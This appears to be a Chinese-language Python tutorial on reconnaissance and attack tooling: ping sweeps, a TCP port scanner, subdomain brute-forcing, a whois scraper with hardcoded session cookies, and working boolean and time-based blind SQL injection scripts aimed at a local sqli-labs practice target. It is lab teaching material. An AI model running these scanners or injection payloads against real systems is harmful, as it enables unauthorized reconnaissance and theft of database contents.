python信息收集
一、主机扫描
1.1 扫描网段
#!/usr/bin/python3
import os
"""
扫描一个网段
"""
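def scan_ip(ip):
    """Ping *ip* twice and print a message when it answers.

    Args:
        ip: Host address to probe, exactly as typed at the scan_net prompt.

    Returns:
        True if ping exited with status 0, otherwise False.
    """
    # Function-scope import so the script's top-level imports stay as they are.
    import subprocess

    # The address comes from input(); passing it as a list element means no
    # shell ever parses it, so shell metacharacters are plain data to ping
    # rather than commands (os.system with an f-string handed them to sh).
    try:
        probe = subprocess.run(
            ["ping", "-c2", "-i0.1", ip],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )
    except FileNotFoundError:
        # os.system() reported a missing ping binary only as a non-zero
        # status with stderr discarded; keep that quiet "host down" outcome.
        return False
    if probe.returncode != 0:
        return False
    print(f"The host {ip} is up")
    return True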
def scan_net():
    """Prompt for a /24 prefix such as "10.1.1." and probe hosts .1 through .254."""
    prefix = input("please input a network,<eg:10.1.1.>:")
    for host in range(1, 255):
        scan_ip(f"{prefix}{host}")
if __name__ == "__main__":
    # Interactive entry point; nothing runs on plain import.
    scan_net()
1.2 扫描网段(多线程)
#!/usr/bin/python3
import os
import threading
import time
"""
扫描一个网段
"""
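def scan_ip(ip):
    """Ping one host twice and print a message when it answers.

    Args:
        ip: Host address to probe; scan_net builds it from user input.

    Returns:
        True if ping exited with status 0, otherwise False.
    """
    # Function-scope import so the script's top-level imports stay as they are.
    import subprocess

    # A list argument means no shell parses the user-supplied address, so
    # shell metacharacters in it are data for ping rather than commands
    # (the os.system f-string handed them to sh).
    try:
        probe = subprocess.run(
            ["ping", "-c2", "-i0.1", ip],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )
    except FileNotFoundError:
        # os.system() reported a missing ping binary only as a non-zero
        # status with stderr discarded; keep that quiet "host down" outcome.
        return False
    if probe.returncode != 0:
        return False
    print(f"The host {ip} is up")
    return True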
def scan_net():
    """Prompt for a /24 prefix, probe .1-.254 in parallel threads and report the elapsed time."""
    prefix = input("please input a network,<eg:10.1.1.>:")
    started = time.time()
    workers = []
    for host in range(1, 255):
        # args must be a tuple, hence the trailing comma for a single argument.
        worker = threading.Thread(target=scan_ip, args=(f"{prefix}{host}",))
        worker.start()
        workers.append(worker)
    # Wait for every probe before printing the summary.
    for worker in workers:
        worker.join()
    elapsed = time.time() - started
    print(f"扫描完毕。用时{elapsed:.3f}秒")
if __name__ == "__main__":
    # Interactive entry point; nothing runs on plain import.
    scan_net()
1.3 扫描网段(结果保存为文件)
#!/usr/bin/python3
import os
import threading
import time
"""
扫描一个网段
"""
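def scan_ip(ip):
    """Ping one host twice and append a line to uphost.txt when it answers.

    Args:
        ip: Host address to probe; scan_net builds it from user input and
            calls this from a thread per host.

    Returns:
        True if the host answered (a line was written), otherwise False.
    """
    # Function-scope import so the script's top-level imports stay as they are.
    import subprocess

    # A list argument means no shell parses the user-supplied address, so
    # shell metacharacters in it are data for ping rather than commands
    # (the os.system f-string handed them to sh).
    try:
        probe = subprocess.run(
            ["ping", "-c2", "-i0.1", ip],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )
    except FileNotFoundError:
        # os.system() reported a missing ping binary only as a non-zero
        # status with stderr discarded; keep that quiet "host down" outcome.
        return False
    if probe.returncode != 0:
        return False
    # One result per line: without the trailing newline every host landed on
    # the same line of the file.
    with open("uphost.txt", "a", encoding="utf-8") as out:
        out.write(f"The host {ip} is up\n")
    return True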
def scan_net():
    """Prompt for a /24 prefix, probe .1-.254 in parallel threads and report the elapsed time."""
    prefix = input("please input a network,<eg:10.1.1.>:")
    started = time.time()
    workers = []
    for host in range(1, 255):
        # args must be a tuple, hence the trailing comma for a single argument.
        worker = threading.Thread(target=scan_ip, args=(f"{prefix}{host}",))
        worker.start()
        workers.append(worker)
    # Wait for every probe before printing the summary.
    for worker in workers:
        worker.join()
    elapsed = time.time() - started
    print(f"扫描完毕。用时{elapsed:.3f}秒")
if __name__ == "__main__":
    # Interactive entry point; nothing runs on plain import.
    scan_net()
二、端口扫描
端口范围1-65535
#!/usr/bin/python3
import socket
import sys
import time
import tqdm
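def _probe_port(ip, port, timeout):
    """Return True if a TCP connection to (ip, port) succeeds within *timeout* seconds.

    A fresh socket is created for every probe: once a connect attempt has
    completed or failed, the same socket cannot be reused for another one,
    so the single shared socket in the original only ever tested the first
    port meaningfully.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
        client.settimeout(timeout)
        try:
            # connect_ex returns 0 on success and an errno value otherwise.
            return client.connect_ex((ip, port)) == 0
        except OSError:
            # Timeout, unresolvable host and similar errors raise instead of
            # returning a code; treat them as "not open".
            return False


def scan_port(*, timeout=1.0):
    """Prompt for a host and an inclusive port range, then report the open TCP ports.

    Args:
        timeout: Seconds to wait per port before giving up (keyword-only).
            Without it a filtered port can block for minutes.

    Ctrl-C stops the scan with "bye".  Non-numeric or out-of-range port input
    is reported instead of being silently swallowed by a bare except.
    """
    try:
        ip = input("扫描的ip:")
        portstart = input("起始端口号:")
        portend = input("结束端口号:")
        try:
            first, last = int(portstart), int(portend)
        except ValueError:
            print("端口号必须是整数")
            return
        if not 0 <= first <= last <= 65535:
            print("端口范围无效")
            return
        result = []
        start = time.time()
        # +1 so the end port typed at the prompt is itself scanned; the range
        # heading promises 1-65535 and the old exclusive bound dropped the last one.
        for port in tqdm.tqdm(range(first, last + 1)):
            if _probe_port(ip, port, timeout):
                result.append(f"The port {ip}:{port} is up\n")
        end = time.time()
        # Print only after the loop so the progress bar is not disturbed.
        print(f"扫描结束,总共耗时{end-start:.3f}s")
        print("".join(result))
    except KeyboardInterrupt:
        print("bye")
        sys.exit()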
if __name__ == "__main__":
    # Interactive entry point; nothing runs on plain import.
    scan_port()
三、子域名爆破
#!/usr/bin/python
import socket
import time
import sys
"""
根据域名和字典查找子域名及ip
"""
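def scan_subdomain():
    """Prompt for a domain and a wordlist file, then resolve <word>.<domain> for each word.

    Names that resolve are printed with their address; names that do not are
    skipped.  A 0.1 s pause follows every lookup, as in the original, and
    Ctrl-C ends the run quietly.
    """
    domain_name = input("请输入域名:")
    wordlists = input("请输入子域名字典文件名:")
    try:
        # The with-block closes the wordlist even when the loop is interrupted;
        # the original left the file handle open.
        with open(wordlists, encoding="utf-8") as words:
            for line in words:
                # rstrip() removes the trailing newline and any other whitespace.
                word = line.rstrip()
                if not word:
                    # A blank line would only produce ".<domain>"; skip it.
                    continue
                name = f"{word}.{domain_name}"
                try:
                    ip = socket.gethostbyname(name)
                except (OSError, UnicodeError):
                    # socket.gaierror (an OSError) for a name that does not
                    # resolve, UnicodeError when the name cannot be IDNA-encoded
                    # (e.g. an empty label).  Both are expected for wordlist
                    # entries; anything else now propagates instead of being
                    # hidden by a bare except.
                    pass
                else:
                    print(f"域名{name}的IP地址为:{ip}")
                time.sleep(0.1)
    except KeyboardInterrupt:
        sys.exit()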
if __name__ == "__main__":
    # Interactive entry point; nothing runs on plain import.
    scan_subdomain()
四、whois查询
利用IP地址查询进行whois查询,并用爬虫将结果保存
#!/usr/bin/python3
import sys
import requests
import bs4
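def get_url(path="url.txt"):
    """Read one lookup target per line from *path* and return them as a list.

    Args:
        path: File to read; defaults to url.txt in the working directory.

    Returns:
        list[str]: the non-empty lines, stripped of surrounding whitespace.

    Prints a message and exits the program when the file cannot be read.
    """
    try:
        with open(path, "r", encoding="utf-8") as file:
            # Blank lines would otherwise turn into an empty query later on.
            return [line.strip() for line in file if line.strip()]
    except OSError:
        # Only I/O failures are expected here; the bare except also hid
        # programming errors.
        print("无法读取文件")
        sys.exit()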
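def get_html(url, timeout=10):
    """Fetch the ip138 whois page for *url* and return its HTML as text.

    Args:
        url: Lookup target inserted into the page path; assumed to be a bare
            domain or IP address with no path characters — TODO confirm.
        timeout: Seconds to wait for the connection and the response.

    Returns:
        The response body as decoded by requests.

    Raises:
        requests.exceptions.RequestException: on connection failure or timeout.
    """
    ua = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"}
    # NOTE(review): these cookie values look copied from one browser session
    # and will expire; they belong in a config file rather than in source.
    cookie = {
        "Hm_lpvt_aac43b0aec3a1123494f170e0aec4778": "1733104269",
        "Hm_lvt_aac43b0aec3a1123494f170e0aec4778": "1733104262",
        "HMACCOUNT": "6F8CE7D515F473C2"
    }
    newurl = f"https://site.ip138.com/{url}/whois.htm"
    # Send the browser-like UA and cookies; the timeout keeps one stalled
    # server from hanging the whole batch (the original could wait forever).
    response = requests.get(newurl, headers=ua, cookies=cookie, timeout=timeout)
    return response.text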
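def get_whois(url):
    """Return the text of the whois <div> on the ip138 result page for *url*.

    Args:
        url: Lookup target, passed through to get_html.

    Returns:
        The element's text, or "" (after printing a notice) when the page has
        no element with id="whois" — the original crashed with AttributeError
        on that case, e.g. an error or rate-limit page.
    """
    html = get_html(url)
    # Parse with the stdlib html.parser backend.
    result = bs4.BeautifulSoup(html, "html.parser")
    whois = result.find("div", id="whois")
    if whois is None:
        print(f"{url}: 未找到whois结果")
        return ""
    return whois.text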
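def put_result(text, path="whois_result.txt"):
    """Append *text* to *path* (default whois_result.txt).

    Args:
        text: Text to write, as returned by get_whois.
        path: Output file; created if it does not exist.

    A failed write prints a notice and returns; it does not raise.
    """
    try:
        # Explicit UTF-8 so non-ASCII whois text does not depend on the locale.
        with open(path, "a", encoding="utf-8") as file:
            file.write(text)
    except OSError:
        # Permission or disk problems; keep the batch going.
        print("写入结果失败")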
def get_whoiss():
    """Look up every target listed in url.txt and append each result to whois_result.txt."""
    for target in get_url():
        put_result(get_whois(target))
if __name__ == "__main__":
    # Batch entry point; nothing runs on plain import.
    get_whoiss()
五 SQL盲注
自己搭建sqli靶场进行测试
5.1 布尔盲注
原理:根据页面是否正常显示来判断语句正误
思路:先得到页面正确回显,记录源码大小。进行盲注,与正常回显比较大小,如果一致则说明成功。
#!/usr/bin/python3
import sys
import requests
import string
import tqdm
def boolsql_type(url: str) -> str:
    """Classify the injection point at *url* by comparing response lengths.

    Returns "integer", "single" or "double" (numeric, single-quoted or
    double-quoted context); exits the program if none of the three probes
    changes the page length.
    """
    # NOTE(review): none of the requests.get calls has a timeout, so a stalled
    # server hangs the script; a length comparison alone also misclassifies
    # pages whose size varies between requests.
    # Record the length of the normal response as the baseline.
    response = requests.get(url)
    normallen = len(response.text)
    payload = " and 1=2 --+"
    if len(requests.get(url+payload).text) == normallen:
        payload = "' and 1=2 --+"
        if len(requests.get(url + payload).text) == normallen:
            payload = "\" and 1=2 --+"
            if len(requests.get(url + payload).text) == normallen:
                print("请检查此处是否为布尔盲注点")
                sys.exit()
            else:
                print("双引号字符型布尔盲注")
                return "double"
        else:
            print("单引号字符型布尔盲注")
            return "single"
    else:
        print("数字型布尔盲注")
        return "integer"
def bool_sql(url: str) -> None:
    """Determine the current database name length and name at *url* by response length.

    Prints progress and the final name; returns nothing.
    """
    # Detect the injection context.  NOTE(review): `type` shadows the builtin.
    type = boolsql_type(url)
    # The character must be quoted; the database does not accept bare characters.
    # The STR placeholder must stay upper-case: a lower-case one would also
    # match inside "substr" when replaced.
    if type == "integer":
        lenpayload = f"{url} and length(database())=num --+"
        namepayload = f"{url} and substr(database(),num,1)=\"STR\" --+"
    elif type == "single":
        lenpayload = f"{url}' and length(database())=num --+"
        namepayload = f"{url}' and substr(database(),num,1)=\"STR\" --+"
    else:
        lenpayload = f"{url}\" and length(database())=num --+"
        namepayload = f"{url}\" and substr(database(),num,1)='STR' --+"
    # Record the length of the normal response as the baseline.
    response = requests.get(url)
    normallen = len(response.text)
    # Guess the name length.  NOTE(review): the loop has no upper bound and
    # no request timeout, so it never terminates if no length ever matches.
    dblen = 1
    while True:
        print(f"测试长度为{dblen}.....")
        exp = lenpayload.replace("num", str(dblen))
        test_response = requests.get(exp)
        if len(test_response.text) == normallen:
            print(f"数据库名称长度为{dblen}")
            break
        dblen += 1
    # Guess the name one position at a time.
    # Candidate characters from the string module: lower, upper, digits, underscore.
    stra = string.ascii_lowercase + string.ascii_uppercase+string.digits+"_"
    dbname = ""
    print("开始测试数据库名")
    for i in tqdm.tqdm(range(1,dblen+1)):
        for j in stra:
            tem = namepayload.replace("num",str(i))
            exp = tem.replace("STR",j)
            test_response = requests.get(exp)
            if len(test_response.text) == normallen:
                dbname = dbname + j
                break
    # A position whose character is outside `stra` is silently left out.
    print(f"数据库名为:{dbname}")
if __name__ == "__main__":
    # Target is the local sqli lab described in the section intro.
    bool_sql("http://192.168.1.3/sqli/Less-8/?id=1")
5.2 时间盲注
原理:添加sleep函数,根据页面加载时间是否变化判断注入是否成功
思路:添加sleep后设置响应超时时间,一旦超时就异常捕获,说明注入成功
#!/usr/bin/python3
import sys
import requests
import string
import tqdm
def timesql_type(url: str) -> str:
    """Classify the injection point at *url* by whether a probe exceeds its timeout.

    Returns "integer", "single" or "double" (numeric, single-quoted or
    double-quoted context); exits the program when no probe times out.
    """
    # NOTE(review): a server that is merely slow also trips the 3 s timeout,
    # so a ReadTimeout is not conclusive; only ReadTimeout is caught here,
    # any other request error propagates.
    try:
        payload = " and sleep(3) --+"
        requests.get(url+payload,timeout=3)
    except requests.exceptions.ReadTimeout:
        print("数字型时间盲注")
        return "integer"
    try:
        payload = "' and sleep(3) --+"
        requests.get(url + payload, timeout=3)
    except requests.exceptions.ReadTimeout:
        print("单引号字符型时间盲注")
        return "single"
    try:
        payload = "\" and sleep(3) --+"
        requests.get(url + payload, timeout=3)
    except requests.exceptions.ReadTimeout:
        print("双引号字符型时间盲注")
        return "double"
    print("请检查注入点是否可以sql注入")
    sys.exit()
def time_sql(url: str) -> None:
    """Determine the current database name length and name at *url* by response delay.

    Prints progress and the final name; returns nothing.
    """
    # Detect the injection context.  NOTE(review): `type` shadows the builtin.
    type = timesql_type(url)
    # The character must be quoted; the database does not accept bare characters.
    # NOTE(review): the double-quote lenpayload lacks the space before "--+"
    # that the other five payloads have — inconsistent, confirm intended.
    if type == "integer":
        lenpayload = f"{url} and if(length(database())=num,sleep(3),true) --+"
        namepayload = f"{url} and if(substr(database(),num,1)=\"STR\",sleep(3),true) --+"
    elif type == "single":
        lenpayload = f"{url}' and if(length(database())=num,sleep(3),true) --+"
        namepayload = f"{url}' and if(substr(database(),num,1)=\"STR\",sleep(3),true) --+"
    else:
        lenpayload = f"{url}\" and if(length(database())=num,sleep(3),true)--+"
        namepayload = f"{url}\" and if(substr(database(),num,1)=\"STR\",sleep(3),true) --+"
    # Guess the name length; a ReadTimeout marks the match.  NOTE(review): the
    # loop has no upper bound, so it never terminates if no length matches.
    dblen = 1
    while True:
        print(f"测试长度为{dblen}.....")
        exp = lenpayload.replace("num", str(dblen))
        try:
            requests.get(exp,timeout=3)
        except requests.exceptions.ReadTimeout:
            print(f"数据库名称长度为{dblen}")
            break
        dblen += 1
    # Guess the name one position at a time.
    # Candidate characters from the string module: lower, upper, digits, underscore.
    stra = string.ascii_lowercase + string.ascii_uppercase+string.digits+"_"
    dbname = ""
    print("开始测试数据库名")
    for i in tqdm.tqdm(range(1,dblen+1)):
        for j in stra:
            tem = namepayload.replace("num",str(i))
            exp = tem.replace("STR",j)
            try:
                requests.get(exp, timeout=3)
            except requests.exceptions.ReadTimeout:
                dbname = dbname + j
                break
    # A position whose character is outside `stra` is silently left out.
    print(f"数据库名为:{dbname}")
if __name__ == "__main__":
    # Target is the local sqli lab described in the section intro.
    time_sql("http://192.168.1.3/sqli/Less-9/?id=1")
